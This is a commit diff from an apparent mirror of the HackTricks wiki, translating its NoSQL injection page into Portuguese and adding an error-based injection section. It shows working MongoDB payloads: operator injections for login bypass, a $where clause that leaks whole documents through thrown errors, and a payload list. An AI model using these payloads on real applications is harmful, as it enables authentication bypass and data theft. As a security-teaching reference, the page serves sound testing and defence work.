maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/nosql-injection.md'] to pt

Browse Source
This commit is contained in:
Translator 2025-07-08 19:36:58 +00:00
parent c633199d55
commit f4af81244c
1 changed files with 11 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
src/pentesting-web/nosql-injection.md
View File

@ -1,4 +1,4 @@
# NoSQL injection
# Injeção NoSQL
{{#include ../banners/hacktricks-training.md}}
@ -6,7 +6,7 @@
Em PHP, você pode enviar um Array mudando o parâmetro enviado de _parameter=foo_ para _parameter\[arrName]=foo._
Os exploits são baseados em adicionar um **Operator**:
Os exploits são baseados em adicionar um **Operador**:
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
@ -19,7 +19,7 @@ username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non
```
### Bypass de autenticação básica
**Usando diferente de ($ne) ou maior que ($gt)**
**Usando not equal ($ne) ou greater ($gt)**
```bash
#in URL
username[$ne]=toto&password[$ne]=toto
@ -108,9 +108,15 @@ Usando o operador **$func** da biblioteca [MongoLite](https://github.com/agentej
}
]
```
### Injeção Baseada em Erro
Injete `throw new Error(JSON.stringify(this))` em uma cláusula `$where` para exfiltrar documentos completos via erros de JavaScript do lado do servidor (requer que a aplicação vaze erros de banco de dados). Exemplo:
```json
{ "$where": "this.username='bob' && this.password=='pwd'; throw new Error(JSON.stringify(this));" }
```
## MongoDB Payloads
Lista [a partir daqui](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
Lista [from here](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
```
true, $where: '1 == 1'
, $where: '1 == 1'
@ -229,5 +235,6 @@ get_password(u)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
- [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
- [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
- [https://sensepost.com/blog/2025/nosql-error-based-injection/](https://sensepost.com/blog/2025/nosql-error-based-injection/)
{{#include ../banners/hacktricks-training.md}}